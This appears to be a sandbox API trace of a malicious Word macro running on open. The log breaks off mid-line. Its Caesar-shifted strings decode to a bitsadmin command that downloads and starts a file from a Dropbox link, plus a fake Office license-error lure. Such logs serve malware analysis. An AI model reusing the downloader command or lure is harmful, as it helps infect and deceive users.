[0017.069] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="NewMacros", cchCount2=-1) returned 3 [0017.069] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 2 [0017.069] IUnknown:AddRef (This=0x788e200) returned 0x4 [0017.069] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="VBA", cchCount1=3, lpString2="Normal", cchCount2=6) returned 3 [0017.069] IUnknown:AddRef (This=0x72e0930) returned 0x8 [0017.070] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Word", cchCount1=4, lpString2="Normal", cchCount2=6) returned 3 [0017.070] IUnknown:AddRef (This=0x72df850) returned 0x6 [0017.070] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="stdole", cchCount1=6, lpString2="Normal", cchCount2=6) returned 3 [0017.070] wcsncpy_s (in: _Destination=0x287500, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0017.070] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0017.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x287430, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0017.070] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0017.070] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b9c8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0017.070] SysStringByteLen (bstr="潎浲污") returned 0x6 [0017.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b9c8, cbMultiByte=7, lpWideCharStr=0x7832168, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0017.070] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Normal", cchCount1=6, lpString2="Normal", cchCount2=6) returned 2 [0017.070] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.071] IMalloc:Free (This=0x7fefe9e5380, pv=0x7818720) [0017.073] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0017.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b9c8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0017.073] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0017.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b9c8, cbMultiByte=8, lpWideCharStr=0x7832168, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0017.073] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0017.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b9c8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0017.073] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0017.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b9c8, cbMultiByte=8, lpWideCharStr=0x7831c88, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0017.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x287900, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0017.073] lstrlenA (lpString="Project") returned 7 [0017.073] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xa8) returned 0x7a64cb0 [0017.073] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x30) returned 0x7818720 [0017.073] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x60) returned 0x7921780 [0017.074] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xa8) returned 0x7a64d60 [0017.074] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x30) returned 0x78185a0 [0017.074] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NewMacros") returned 0x106aae [0017.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NewMacros", cchWideChar=10, lpMultiByteStr=0x287b60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NewMacros", lpUsedDefaultChar=0x0) returned 10 [0017.074] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="NewMacros") returned 0x106aae [0017.074] bsearch (_Key=0x286a98, _Base=0x797cf20, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fef0d5ce28) returned 0x797cf20 [0017.074] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="NewMacros", cchCount1=-1, lpString2="NewMacros", cchCount2=-1) returned 2 [0017.080] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x1c) returned 0x778b990 [0017.080] strncpy_s (in: _Dst=0x778b990, _DstSize=0x1c, _Src="Project.NewMacros.AutoOpen", _MaxCount=0x1a | out: _Dst="Project.NewMacros.AutoOpen") returned 0x0 [0017.080] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Project") returned 0x10ae2d [0017.080] bsearch (_Key=0x286d58, _Base=0x797cf20, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fef0d5ce28) returned 0x0 [0017.080] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="NewMacros", cchCount2=-1) returned 3 [0017.080] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0017.080] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="Project", cchCount2=-1) returned 2 [0017.080] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="NewMacros") returned 0x106aae [0017.080] bsearch (_Key=0x286d58, _Base=0x797cf20, _NumOfElements=0x2, _SizeOfElements=0x8, _PtFuncCompare=0x7fef0d5ce28) returned 0x797cf20 [0017.080] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="NewMacros", cchCount1=-1, lpString2="NewMacros", cchCount2=-1) returned 2 [0017.080] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="AutoOpen") returned 0x102ad9 [0017.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="025c2b45a3", cchWideChar=11, lpMultiByteStr=0x287110, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="025c2b45a3", lpUsedDefaultChar=0x0) returned 11 [0017.082] GetLocalTime (in: lpSystemTime=0x2871f8 | out: lpSystemTime=0x2871f8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x210)) [0017.082] _ultow_s (in: _Value=0x5c2b45a3, _Buffer=0xbccca54, _BufferCount=0x9, _Radix=16 | out: _Buffer="5c2b45a3") returned 0x0 [0017.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="055c2b45a3", cchWideChar=11, lpMultiByteStr=0x287150, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="055c2b45a3", lpUsedDefaultChar=0x0) returned 11 [0017.082] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7935580 [0017.082] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f5490 [0017.082] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f5850 [0017.082] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79e22c0 [0017.082] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79e2510 [0017.082] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0xbcbc000 [0017.082] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x810) returned 0xbd38480 [0017.082] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd38480) [0017.082] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x810) returned 0x5520490 [0017.083] IMalloc:Free (This=0x7fefe9e5380, pv=0x5520490) [0017.083] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x60) returned 0x79217f0 [0017.083] IUnknown:AddRef (This=0x788e200) returned 0x4 [0017.083] strcpy_s (in: _Dst=0x79e0380, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0017.083] strcpy_s (in: _Dst=0x79e03d0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0017.084] IUnknown:AddRef (This=0x72e0930) returned 0x9 [0017.084] strcpy_s (in: _Dst=0x79e0440, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0017.084] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0xbcbc250 [0017.084] strcpy_s (in: _Dst=0xbcbc278, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0017.084] IUnknown:AddRef (This=0x72df850) returned 0x6 [0017.084] strcpy_s (in: _Dst=0xbcbc2e8, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0017.084] strcpy_s (in: _Dst=0xbcbc310, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0017.086] IUnknown:AddRef (This=0x788df30) returned 0x3 [0017.086] strcpy_s (in: _Dst=0xbcbc380, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0017.086] strcpy_s (in: _Dst=0xbcbc3c8, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0017.086] IMalloc:Free (This=0x7fefe9e5380, pv=0x797cf20) [0017.087] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x28) returned 0x778bc30 [0017.087] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x28) returned 0x778b8d0 [0017.087] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x28) returned 0x778b8a0 [0017.087] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x28) returned 0x778ba20 [0017.087] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x48) returned 0x7724000 [0017.087] strcpy_s (in: _Dst=0xbcbc420, _DstSize=0x9, _Src="AutoOpen" | out: _Dst="AutoOpen") returned 0x0 [0017.087] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x26d) returned 0xbcb0340 [0017.087] IMalloc:Free (This=0x7fefe9e5380, pv=0xbcb0340) [0017.087] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x60) returned 0x7921860 [0017.087] strcpy_s (in: _Dst=0xbcbc438, _DstSize=0xa, _Src="KDFNHXYJY" | out: _Dst="KDFNHXYJY") returned 0x0 [0017.088] strcpy_s (in: _Dst=0x79e0778, _DstSize=0x1a, _Src="ZXUXMWSDNWUXFKZROLAKXAXFS" | out: _Dst="ZXUXMWSDNWUXFKZROLAKXAXFS") returned 0x0 [0017.088] strcpy_s (in: _Dst=0x79e07a0, _DstSize=0xf, _Src="UIZLJHCZYXCKDO" | out: _Dst="UIZLJHCZYXCKDO") returned 0x0 [0017.088] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x26d) returned 0xbcb0340 [0017.088] IMalloc:Free (This=0x7fefe9e5380, pv=0xbcb0340) [0017.088] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x50) returned 0x78a24b0 [0017.088] strcpy_s (in: _Dst=0xbcbc450, _DstSize=0xf, _Src="VRUOAIRHKHHTMF" | out: _Dst="VRUOAIRHKHHTMF") returned 0x0 [0017.088] strcpy_s (in: _Dst=0x79e07b8, _DstSize=0x1a, _Src="IKJKBSKNJNPOGLRADOUVBMSFL" | out: _Dst="IKJKBSKNJNPOGLRADOUVBMSFL") returned 0x0 [0017.088] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0xbcbc4a0 [0017.088] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x26d) returned 0xbcb0340 [0017.088] IMalloc:Free (This=0x7fefe9e5380, pv=0xbcb0340) [0017.088] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x14) returned 0x797cf20 [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0xbcbc6f0 [0017.089] IMalloc:Free (This=0x7fefe9e5380, pv=0x797cf20) [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x7935610 [0017.089] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x7935610) returned 0x80 [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x797cf20 [0017.089] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="AutoOpen") returned 0x102ad9 [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x797cdc0 [0017.089] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="KDFNHXYJY") returned 0x10490a [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x797bb00 [0017.089] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="VRUOAIRHKHHTMF") returned 0x100fdd [0017.089] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="AutoOpen", cchCount1=-1, lpString2="AutoOpen", cchCount2=-1) returned 2 [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x58) returned 0x78a2510 [0017.089] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x78a2510) returned 0x58 [0017.089] IMalloc:Free (This=0x7fefe9e5380, pv=0x778b990) [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x797a500 [0017.089] IMalloc:Free (This=0x7fefe9e5380, pv=0x797a500) [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x797a500 [0017.089] IMalloc:Free (This=0x7fefe9e5380, pv=0x797a500) [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x58) returned 0x78a2570 [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x11) returned 0x797a500 [0017.089] IMalloc:Free (This=0x7fefe9e5380, pv=0x797a500) [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x58) returned 0x78a25d0 [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x11) returned 0x797a500 [0017.089] IMalloc:Free (This=0x7fefe9e5380, pv=0x797a500) [0017.089] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x58) returned 0x78a2630 [0017.090] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x797a500 [0017.090] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a2510) [0017.090] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x40) returned 0x7725400 [0017.093] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f290 [0017.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x286030, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0017.093] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0017.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x286030, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0017.099] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0017.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="045c2b45a3", cchWideChar=11, lpMultiByteStr=0x286340, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="045c2b45a3", lpUsedDefaultChar=0x0) returned 11 [0017.099] GetLocalTime (in: lpSystemTime=0x286428 | out: lpSystemTime=0x286428*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x220)) [0017.099] _ultow_s (in: _Value=0x5c2b45a3, _Buffer=0xbd4dfb4, _BufferCount=0x9, _Radix=16 | out: _Buffer="5c2b45a3") returned 0x0 [0017.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="065c2b45a3", cchWideChar=11, lpMultiByteStr=0x286380, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="065c2b45a3", lpUsedDefaultChar=0x0) returned 11 [0017.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2861c0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0017.100] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0017.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x285de0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0017.100] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0017.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x285de0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0017.106] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0017.106] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x14) returned 0x797cea0 [0017.106] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xc0) returned 0x78f7940 [0017.106] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x78f7940) returned 0xc0 [0017.107] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x810) returned 0x5520490 [0017.107] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6960000 [0017.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e720, cbMultiByte=16, lpWideCharStr=0x696016c, cchWideChar=34 | out: lpWideCharStr="fpg1h{h 2f %zdlw") returned 16 [0017.109] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x318) returned 0x76f11e0 [0017.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e73c, cbMultiByte=20, lpWideCharStr=0x6960822, cchWideChar=42 | out: lpWideCharStr="iru 2w 8 \\NHUT ) elw") returned 20 [0017.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e75c, cbMultiByte=17, lpWideCharStr=0x6960d50, cchWideChar=36 | out: lpWideCharStr="vdgplq 2wudqvihu ") returned 17 [0017.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e77a, cbMultiByte=1, lpWideCharStr=0x6961278, cchWideChar=4 | out: lpWideCharStr="X") returned 1 [0017.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e788, cbMultiByte=4, lpWideCharStr=0x6961780, cchWideChar=10 | out: lpWideCharStr="NHI ") returned 4 [0017.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e798, cbMultiByte=8, lpWideCharStr=0x6961c8e, cchWideChar=18 | out: lpWideCharStr="2grzqord") returned 8 [0017.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e7ac, cbMultiByte=29, lpWideCharStr=0x69621a4, cchWideChar=60 | out: lpWideCharStr="g 2sulrulw| qrupdo kwwsv=22zz") returned 29 [0017.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e7d6, cbMultiByte=21, lpWideCharStr=0x69626e4, cchWideChar=44 | out: lpWideCharStr="z1gurser{1frp2v2:e<66") returned 21 [0017.110] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x69f0000 [0017.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e800, cbMultiByte=12, lpWideCharStr=0x69f0cf4, cchWideChar=26 | out: lpWideCharStr="5u9yplxk{o24") returned 12 [0017.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e818, cbMultiByte=12, lpWideCharStr=0x69f13a2, cchWideChar=26 | out: lpWideCharStr="thv|r}dqdqul") returned 12 [0017.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e830, cbMultiByte=4, lpWideCharStr=0x69f18c0, cchWideChar=10 | out: lpWideCharStr="yr{l") returned 4 [0017.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e840, cbMultiByte=27, lpWideCharStr=0x69f1dce, cchWideChar=56 | out: lpWideCharStr="w|ri1h{hBgo@4 (dssgdwd(_lxr") returned 27 [0017.111] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0xbcbc940 [0017.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e868, cbMultiByte=29, lpWideCharStr=0x69f230a, cchWideChar=60 | out: lpWideCharStr="ogz1h{h )vwduw (dssgdwd(_lxro") returned 29 [0017.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e892, cbMultiByte=7, lpWideCharStr=0x69f284a, cchWideChar=16 | out: lpWideCharStr="gz1h{h%") returned 7 [0017.112] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6a00000 [0017.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e8b0, cbMultiByte=18, lpWideCharStr=0x6a00714, cchWideChar=38 | out: lpWideCharStr="Huuru 4<;:7= \\rx p") returned 18 [0017.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e8ce, cbMultiByte=24, lpWideCharStr=0x6a00dce, cchWideChar=50 | out: lpWideCharStr="xvw kdyh Riilfh Surihvvl") returned 24 [0017.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e8f2, cbMultiByte=20, lpWideCharStr=0x6a01304, cchWideChar=42 | out: lpWideCharStr="rqdo Hglwlrq wr uhdg") returned 20 [0017.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e912, cbMultiByte=9, lpWideCharStr=0x6a01832, cchWideChar=20 | out: lpWideCharStr=" wklv frq") returned 9 [0017.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e928, cbMultiByte=14, lpWideCharStr=0x6a01d4a, cchWideChar=30 | out: lpWideCharStr="whqw/ sohdvh x") returned 14 [0017.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e942, cbMultiByte=13, lpWideCharStr=0x6a0226c, cchWideChar=28 | out: lpWideCharStr="sjudgh |rxu o") returned 13 [0017.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e95c, cbMultiByte=15, lpWideCharStr=0x6a0278c, cchWideChar=32 | out: lpWideCharStr="lfhqfh1 Ylvlw z") returned 15 [0017.113] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0xbcbcb90 [0017.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e978, cbMultiByte=19, lpWideCharStr=0x6a02cb0, cchWideChar=40 | out: lpWideCharStr="zz1plfurvriw1frp ir") returned 19 [0017.113] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x6b90000 [0017.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e9a0, cbMultiByte=5, lpWideCharStr=0x6b912d4, cchWideChar=12 | out: lpWideCharStr="u kho") returned 5 [0017.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xbd4e9b2, cbMultiByte=1, lpWideCharStr=0x6b91974, cchWideChar=4 | out: lpWideCharStr="s") returned 1 [0017.114] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x70) returned 0x79b15b0 [0017.114] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xb8) returned 0x79f5550 [0017.114] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x3d0) returned 0xbd48480 [0017.115] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778bd20 [0017.115] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x797cf00 [0017.115] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x79353d0 [0017.115] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f290 [0017.115] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f2a0 [0017.115] IUnknown:AddRef (This=0x788e200) returned 0x5 [0017.115] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x38) returned 0x78185e0 [0017.115] IUnknown:AddRef (This=0x72e0930) returned 0xb [0017.115] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x38) returned 0x7818120 [0017.115] IUnknown:AddRef (This=0x72df850) returned 0x7 [0017.115] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x38) returned 0x78184e0 [0017.115] wcsncpy_s (in: _Destination=0x284df0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0017.115] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0017.115] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x284d20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0017.115] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0017.116] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x40) returned 0x77ddf50 [0017.116] IUnknown:AddRef (This=0x788df30) returned 0x4 [0017.116] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x38) returned 0x7818560 [0017.116] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x640) returned 0xbd49970 [0017.116] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778b900 [0017.116] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f2b0 [0017.116] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f2c0 [0017.116] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778b960 [0017.116] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x79356a0 [0017.116] ITypeLib:RemoteGetLibAttr (in: This=0x788e200, ppTLibAttr=0x284ee0, pDummy=0x0 | out: ppTLibAttr=0x284ee0, pDummy=0x0) returned 0x0 [0017.116] ITypeLib:LocalReleaseTLibAttr (This=0x788e200) returned 0x0 [0017.116] IUnknown:Release (This=0x788e200) returned 0x6 [0017.117] strcpy_s (in: _Dst=0xbcbcc48, _DstSize=0x9, _Src="VBE7.DLL" | out: _Dst="VBE7.DLL") returned 0x0 [0017.118] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x26d) returned 0xbcb0340 [0017.118] IMalloc:Free (This=0x7fefe9e5380, pv=0xbcb0340) [0017.119] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x26d) returned 0xbcb0340 [0017.119] IMalloc:Free (This=0x7fefe9e5380, pv=0xbcb0340) [0017.119] IMalloc:Alloc 